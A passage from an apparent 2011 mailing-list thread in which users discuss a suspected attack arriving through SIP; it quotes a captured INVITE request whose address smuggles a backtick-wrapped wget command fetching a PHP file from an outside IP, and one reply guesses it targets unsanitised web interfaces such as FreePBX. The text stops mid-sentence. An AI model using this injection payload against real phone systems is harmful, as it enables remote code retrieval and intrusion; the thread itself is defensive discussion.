* You are viewing the archive for September 11th, 2011

new sort of shell attack attempt via SIP?

On 09/11/2011 07:05 PM, Tom Browning wrote:

> INVITE sip:00123456789000`wgetx20-Ox20/dev/nullx20http://91.223.89.94/V.php`@x.x.x.x
> SIP/2.0.

My guess is that this attack presumes you are running a web GUI such
as FreePBX, and that it does not sanitise embedded HTML. Thus, when
reviewing your CDRs, for instance, you might click on such a link.

A more sophisticated variant of that would embed